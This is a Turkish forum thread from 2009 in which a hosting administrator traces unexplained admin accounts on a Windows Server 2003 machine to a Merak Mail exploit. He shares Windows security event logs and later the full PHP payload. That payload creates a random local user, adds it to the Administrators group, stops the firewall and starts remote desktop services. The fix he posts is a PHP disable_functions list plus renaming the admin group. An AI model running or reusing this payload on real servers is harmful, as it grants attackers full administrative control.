Forum
Bildirimler
Hepsini Temizle
Windows Server
14
Yazılar
3
Üyeler
0
Reactions
1,046
Görüntüleme
Konu başlatıcı
merhaba;
hosting hizmeti veren bir serverim var otomatik ivamuser lar açılmış ve bu user admin group eklenmiş ? ayrıca firewal hizmeti kapatılmış ? bu hangi sicripte veya uygulama ile olabilir ?
yanıtınızı bekliyorum.
Gönderildi : 02/02/2009 13:20
Merhaba,
Serverinizin isletim sistemi vrsiyonu nedir ?
Hangi uygulamalari ve programlari calistiriyor ( IIS, vs )
- IWAM USER IIS kurulumunda gelen bir kullanicidir
- Defaultda administrator grubuna ekli degildit
- Server sisteminizde ( Windows ise ) Firewall hizmeti defaultda kapali gelir zaten
Scripte gelince benim tahminim bu sunucuya ulasan bir baskasi bu kullaniciyi admin grubuna eklemis olabilir, en cok kullanilan guncel script lerin tum listesini Microsoft - Hey script guy arşivini indirerek ulaşabilirsiniz
Gönderildi : 02/02/2009 18:31
Konu başlatıcı
serkan bey merhaba;
2003 std. framework 2.0 var iss 5.0 var merak mail çalışıyor. windows firewal hizmeti sorumu o zaman şöyle sorayım ?
iwam user2345, iwam user2342 randım nasıl sistemde olmadan açılır ve nasıl admin grubuna dahil edilir mutlaka bunu uzaktan açan bir vbs vb. bişey var ?
kolay gelsin.
Gönderildi : 02/02/2009 21:08
Konu başlatıcı
konu hakkında yorumlarınızı bekliyorum.
iyi çalışmalar.
Gönderildi : 03/02/2009 17:06
Merhabalar,
Simdi durum degisti, hesaplarin acildigi makinede ( eger domaine bagli ise domain policy uzerinden degilse local policy )
computer configuration - wind. - sec. - loc - audit policy nin icindeki "Audit account management" a cift tiklayip success ve failure lari isaretleyin, daha snra sonuclari gormek yani hesap acma islemlerini takip etmek icin eventvwr.msc den - security tabinin altindaki loglara bakin, eger bu tam olarak isimi gormez derseniz 3ncu parti mcafee kurumsal urunlerini kullanmanizi oneririm.
Gönderildi : 05/02/2009 15:31
Konu başlatıcı
sorumu daha iyi anlatmak için ekran görüntüsünü gönderiyorum
[URL= http://img178.imageshack.us/img178/8440/85469218.th.jp g" target="_blank">
http://img178.imageshack.us/img178/8440/85469218.th.jp g"/> [/IMG][/URL]
Gönderildi : 24/02/2009 20:16
Merhaba,
size önerdiğim gibi audit yapmanızı öneririm, audit account management success i secerseniz işinizi görecektir, auditle nasıl çalışacağınızın örneğini paylaşım ve güvenlik isimli makalede bulabilirsiniz, umarım yardımcı olur.
Gönderildi : 24/02/2009 22:42
Konu başlatıcı
serkan bey teşekkürler.
incelemeden sonra bilgi vereceğim
iyi çalışmalar.
Gönderildi : 24/02/2009 23:16
Konu başlatıcı
serkan bey merhaba;
inceleme yaptım ve logda iwam user açma olayını yakaladım. aşağıda bildiriyorum bu olayı nasıl durdurabilirim. ? serveradı yazan yerler makine adı ben bu forumda yazmak istemediğim için serveradı dedim.
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi 636 NT AUTHORITY\SYSTEM SERVERADI "Güvenliği Etkinleştirilmiş Yerel Grup Üyesi Eklendi:
Üye Adı: -
Üye Kimliği: SERVERADI \IWAM_62992
Hedef Hesap Adı: Users
Hedef Etki Alanı: Builtin
Hedef Hesap Kimliği: BUILTIN\Users
Arayan Kullanıcı Adı: SERVERADI $
Arayan Etki Alanı: ONEISP
Arayan Oturum Açma Kimliği: (0x0,0x3E7)
Ayrıcalıklar: -
Gönderildi : 23/03/2009 14:07
Konu başlatıcı
serkan bey öneriniz nedir ?
iyi çalışmalar.
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi 636 NT AUTHORITY\SYSTEM SERVERADI "Güvenliği Etkinleştirilmiş Yerel Grup Üyesi Eklendi:
Üye Adı: -
Üye Kimliği: SERVERADI\IWAM_62992
Hedef Hesap Adı: Administrators
Hedef Etki Alanı: Builtin
Hedef Hesap Kimliği: BUILTIN\Administrators
Arayan Kullanıcı Adı: SERVERADI$
Arayan Etki Alanı: ONEISP
Arayan Oturum Açma Kimliği: (0x0,0x3E7)
Ayrıcalıklar: -
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi 636 NT AUTHORITY\SYSTEM SERVERADI "Güvenliği Etkinleştirilmiş Yerel Grup Üyesi Eklendi:
Üye Adı: -
Üye Kimliği: SERVERADI\IWAM_62992
Hedef Hesap Adı: Users
Hedef Etki Alanı: Builtin
Hedef Hesap Kimliği: BUILTIN\Users
Arayan Kullanıcı Adı: SERVERADI$
Arayan Etki Alanı: ONEISP
Arayan Oturum Açma Kimliği: (0x0,0x3E7)
Ayrıcalıklar: -
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi 628 NT AUTHORITY\SYSTEM SERVERADI "Kullanıcı Hesabı parola ataması:
Hedef Hesap Adı: IWAM_62992
Hedef Etki Alanı: SERVERADI
Hedef Hesap Kimliği: SERVERADI\IWAM_62992
Arayan Kullanıcı Adı: SERVERADI$
Arayan Etki Alanı: ONEISP
Arayan Oturum Açma Kimliği: (0x0,0x3E7)
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi 642 NT AUTHORITY\SYSTEM SERVERADI "Kullanıcı Hesabı Değiştirildi:
Hedef Hesap Adı: IWAM_62992
Hedef Etki Alanı: SERVERADI
Hedef Hesap Kimliği: SERVERADI\IWAM_62992
Arayan Kullanıcı Adı: SERVERADI$
Arayan Etki Alanı: ONEISP
Arayan Oturum Açma Kimliği: (0x0,0x3E7)
Ayrıcalıklar: -
Değişen Öznitelikler:
SAM Hesabı Adı: IWAM_62992
Görünen Ad: <değer ayarlanmadı>
Kullanıcı Asıl Adı: -
Giriş Dizini: <değer ayarlanmadı>
Giriş Sürücüsü: <değer ayarlanmadı>
Komut Dosyası Yolu: <değer ayarlanmadı>
Profil Yolu: <değer ayarlanmadı>
Kullanıcı İş İstasyonları: <değer ayarlanmadı>
Parola Son Ayarlama: 23.03.2009 06:02:58
Hesap Süresi Sonu: <hiçbir zaman>
Birincil Grup Kimliği: 513
İzin Verilen Temsilci: -
Eski UAC Değeri: 0x4AA34C8
Yeni UAC Değeri: 0x4AA34C8
Kullanıcı Hesabı Denetimi: -
Kullanıcı Parametreleri: -
SID Geçmişi: -
Oturum Açma Saatleri: <değer değiştirildi, ancak görüntülenmedi>
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi 626 NT AUTHORITY\SYSTEM SERVERADI "Kullanıcı Hesabı Etkinleştirildi:
Hedef Hesap Adı: IWAM_62992
Hedef Etki Alanı: SERVERADI
Hedef Hesap Kimliği: SERVERADI\IWAM_62992
Arayan Kullanıcı Adı: SERVERADI$
Arayan Etki Alanı: ONEISP
Arayan Oturum Açma Kimliği: (0x0,0x3E7)
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi 624 NT AUTHORITY\SYSTEM SERVERADI "Kullanıcı Hesabı Oluşturuldu:
Yeni Hesap Adı: IWAM_62992
Yeni Etki Alanı: SERVERADI
Yeni Hesap Kimliği: SERVERADI\IWAM_62992
Arayan Kullanıcı Adı: SERVERADI$
Arayan Etki Alanı: ONEISP
Arayan Oturum Açma Kimliği: (0x0,0x3E7)
Ayrıcalıklar: -
Öznitelikler:
SAM Hesabı Adı: IWAM_62992
Görünen Ad: <değer ayarlanmadı>
Kullanıcı Asıl Adı: -
Giriş Dizini: <değer ayarlanmadı>
Giriş Sürücüsü: <değer ayarlanmadı>
Komut Dosyası Yolu: <değer ayarlanmadı>
Profil Yolu: <değer ayarlanmadı>
Kullanıcı İş İstasyonları: <değer ayarlanmadı>
Parola Son Ayarlama: <hiçbir zaman>
Hesap Süresi Sonu: <hiçbir zaman>
Birincil Grup Kimliği: 513
İzin Verilen Temsilci: -
Eski UAC Değeri: 0x4AA34C8
Yeni UAC Değeri: 0x4AA34C8
Kullanıcı Hesabı Denetimi: -
Kullanıcı Parametreleri: <değer ayarlanmadı>
SID Geçmişi: -
Oturum Açma Saatleri: <değer değiştirildi, ancak görüntülenmedi>
"
23.03.2009 06:02:58 Security Başarı Denetimi Hesap Yönetimi 632 NT AUTHORITY\SYSTEM SERVERADI "Güvenliği Etkinleştirilmiş Genel Grup Üyesi Eklendi:
Üye Adı: -
Üye Kimliği: SERVERADI\IWAM_62992
Hedef Hesap Adı: None
Hedef Etki Alanı: SERVERADI
Hedef Hesap Kimliği: SERVERADI\None
Arayan Kullanıcı Adı: SERVERADI$
Arayan Etki Alanı: ONEISP
Arayan Oturum Açma Kimliği: (0x0,0x3E7)
Ayrıcalıklar: -
"
Gönderildi : 23/03/2009 14:38
Konu başlatıcı
merhaba;
serkan bey dışında başka bir hocadan da yanıt almak isterim.
iyi çalışmalar.
Gönderildi : 23/03/2009 16:54
Merhaba ;
plesk , helm , cpanel gibi hosting yönetimi yapan yazılımlar bu kullanıcıları otomatik olarak sisteme tanımlarlar.
Danışman - ITSTACK Bilgi Sistemleri
****************************************************************
Probleminiz Çözüldüğünde Sonucu Burada Paylaşırsanız.
Sizde Aynı Problemi Yaşayanlar İçin Yardım Etmiş Olursunuz.
Eğer sorununuz çözüldü ise lütfen "çözüldü" olarak işaretlerseniz diğer üyeler için çok büyük kolaylık sağlayacaktır.
*****************************************************************
Gönderildi : 23/03/2009 21:23
Konu başlatıcı
hakan bey merhaba;
plesk , helm , cpanel bu tarz bir uygulama yok ayrıca loglarda size ilettiğim yaratma işlemi direkt benim bilgim dışında oluyor dikkatli bakarsanız
Hedef Hesap Adı: IWAM_62992
Hedef Etki Alanı: SERVERADI
Hedef Hesap Kimliği: SERVERADI\IWAM_62992
Arayan Kullanıcı Adı: SERVERADI$
Arayan Etki Alanı: ONEISP
Arayan Oturum Açma Kimliği: (0x0,0x3E7)
Değişen Öznitelikler:
SAM Hesabı Adı: IWAM_62992
Görünen Ad: <değer ayarlanmadı>
Kullanıcı Asıl Adı: -
Giriş Dizini: <değer ayarlanmadı>
Giriş Sürücüsü: <değer ayarlanmadı>
Komut Dosyası Yolu: <değer ayarlanmadı>
Profil Yolu: <değer ayarlanmadı>
Kullanıcı İş İstasyonları: <değer ayarlanmadı>
Parola Son Ayarlama: 23.03.2009 06:02:58
Hesap Süresi Sonu: <hiçbir zaman>
Birincil Grup Kimliği: 513
İzin Verilen Temsilci: -
Eski UAC Değeri: 0x4AA34C8
Yeni UAC Değeri: 0x4AA34C8
Kullanıcı Hesabı Denetimi: -
Kullanıcı Parametreleri: -
SID Geçmişi: -
yaratan random bir kod oluşturuyor. arayan kullanıcı adı: serveradi$ olarak görünüyor bu durumda hangi userları veya grupları kontrol etmem gerekir. netden araştırdım bole bir sorun yaşan bulamadım yada ben bulamadım 🙁
yani kod windows sistemini çatır çatır kullanıyor nasıl bir önlem almam gerekir ?
ilginize teşekkürker.
Gönderildi : 23/03/2009 21:37
Konu başlatıcı
merhaba;
konu ile bir çok arkadaş telefon ile bana ulaştı bende burada konu hakkında bilgi vermek istiyorum
merak mail 8.0.3 ver kullanan 2003 sunucularında böyle bir sıkıntı olmaktadır cozumleri aşağı tarafınıza iletiyorum.
NEDENİ;
mailadmin panelinden veya mail olarak aşağıdaki code bloğu gönderilir
------------------------------6a52fd0313af
Content-Disposition: form-data; name="data"
ob_start();
phpinfo();
$phpinfo = array('phpinfo' => array());
if(preg_match_all('#(?:<h2>(?:<a name=".*?">)?(.*?)(?:</a>)?</h2>)|(?:<tr(?: class=".*?")?><t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>(?:<t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>(?:<t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>)?)?</tr>)#s', ob_get_clean(), $matches, PREG_SET_ORDER))
foreach($matches as $match)
if(strlen($match[1]))
$phpinfo[$match[1]] = array();
elseif(isset($match[3]))
$phpinfo[end(array_keys($phpinfo))][$match[2]] = isset($match[4]) ? array($match[3], $match[4]) : $match[3];
else
$phpinfo[end(array_keys($phpinfo))][] = $match[2];
echo "VULNERABLE\n";
echo "SYSTEM: ".$phpinfo['phpinfo']['System']."\n";
if($_ENV['OS'] == "Windows_NT") {
$login ="IWAM_".rand (10000, 99999);
$password = "-".rand (10000, 99999)."@";
echo "LOGIN: $login\n";
echo "PASSWORD: $password\n";
@system("net user $login $password /ADD /EXPIRES:NEVER /ACTIVE:YES");
@system("net localgroup administrators $login /add");
@system("net localgroup administrateurs $login /add");
@system("net localgroup administratorens $login /add");
@system("net stop sharedaccess");
@system("net start dcomlaunch");
@system("net start termservice");
taille("c:");
taille("d:");
taille("e:");
taille("f:");
taille("g:");
taille("h:");
taille("i:");
taille("j:");
taille("k:");
taille("l:");
taille("m:");
taille("n:");
taille("o:");
taille("p:");
taille("q:");
taille("r:");
taille("s:");
taille("t:");
taille("u:");
taille("v:");
taille("w:");
taille("x:");
taille("y:");
taille("z:");
} else {
taille("/");
}
function download($file,$link) {
@unlink($file);
$get = @file_get_contents($link);
$fhack = @fopen ($file, "a");
@fwrite ($fhack, $get);
@fclose ($fhack);
}
function taille($disk) {
// Entrez la partition
$dt = disk_total_space($disk);
// Réentrez la partition
$df = disk_free_space($disk);
if(!$dt) { return; }
$used = $dt - $df;
echo "$disk Total: ".getSize($dt)." Free: ".getSize($df)." Used: ".getSize($used)."\n";
}
function getSize($taille, $units = "yes") {
$dimSize = array("octets", "Ko", "Mo", "Go", "To");
$i = 0;
while ($taille >= 1024) {
$taille /= 1024;
$i++;
}
return ($units == "yes") ? round($taille, 2) . " " . $dimSize[$i] : round($taille, 2);
}
------------------------------6a52fd0313af--
------------------------------------------------------------------------------------------------------------------------
koda bakarsanız yapılan işlemde random userları açılıyor ve admin gruba ekleniyor bundan sonra yapılcak işlemleri anlatmama sanırım gerek yok.
ÇÖZÜM:
öncelikle sistem sahibi bunun phpden kaynaklı olmasından dolayı php.ini üzerinde disable_functions parametrelerin neler olduguna bakmasi lazım
disable_functions eger boş ise aşağıdaki parmetereler girmesini öneririm tabi bu parametreleri girdikten sonra 2003 üzerinde içerik yönetim sistemli sayfaları var ise fonsiyonların kapatılmasından dolayı çalışma sorunu olabilir. fonsiyonları inceleme yaparak eklemenizi tavsiye ederim.
------------------------------------------------------------------------------------------------------
disable_functions = foreach, glob, openbasedir, posix_getpwuid, f_open, system,dl, array_compare, array_user_key_compare, passthru, cat, exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, ini_restore, mysql_list_dbs, get_current_user, getmyuid,pconnect, link, symlink, fin, passthruexec, fileread, shell_exec, pcntl_exec, ini_alter, parse_ini_file, leak, apache_child_terminate, chown, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, allow_url_fopen, fpassthru, execute, shell, curl_exec, chgrp, stream_select, passthru, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual
-----------------------------------------------------------------------------------------------
tabi bu işlem bizim bu sorunu çözmüyor çünkü merak için kullanılan ini dosyası bu değil
bizim ayarlama yapacağımız dosya windows içinde wmi.ini dosyası merak mail bu ini dosyası kullanıyor
dosya açıldıktan sonra sizde bakarak anlayabilirsiniz disable_func parametesi tanımı olmadığını ve aşağıdaki tanımlamaları yapmanıızı gerekmektedir.
--------------------------------------------------------------------------------------------
disable_functions = foreach, glob, openbasedir, posix_getpwuid, f_open, system,dl, array_compare, array_user_key_compare, passthru, cat, exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, ini_restore, mysql_list_dbs, get_current_user, getmyuid,pconnect, link, symlink, fin, passthruexec, fileread, shell_exec, pcntl_exec, ini_alter, parse_ini_file, leak, apache_child_terminate, chown, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, allow_url_fopen, fpassthru, execute, shell, curl_exec, chgrp, stream_select, passthru, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual
-------------------------------------------------
bu işlemi yaptıktan sonra yapılması gereken 2 işlem daha var
1. olarak admin grup adını değiştimeniz ve bu adını makine adı veya benzeri olması örnek olarak atıyorum: s35 gibi mesala böylece yukarıdaki kod bloğunda admine alma işlemi kod çalışsa bile yapılamayacaktır.
2. olarak C:\Program Files\Merak\html\admin\inc accounts.php dosyasını kullanılmaması için uzantı değişikliği yapılması gerekir. bunu sakıncası kullanıcılar mailadmin kullanımını bundan sonra yapamayacaktır. tercih size kalmış.
bundan sonra issreset yapmanız veya sistemi tekrar baştan reset atmanız gerekir tercih size kalmış.
ancak şu var bu işlemleri yapmak tamam bu işten kurtuldum anlamına gelmesin benim her zaman söylediğim bir söz var yazılım ben veya benim tanıdığım biri tarafından yazılmamış her yazılım bu isterse dünyanın en büyük firması olsun her zaman güvenlik "0" anlamına gelir. yani sonuç olarak bu işlemleri yaptıktan sonra siz admin gruba veya sisteminizi ara ara kontrol etmenizi isterim.
iyi çalışmalar.
Gönderildi : 19/05/2009 18:07
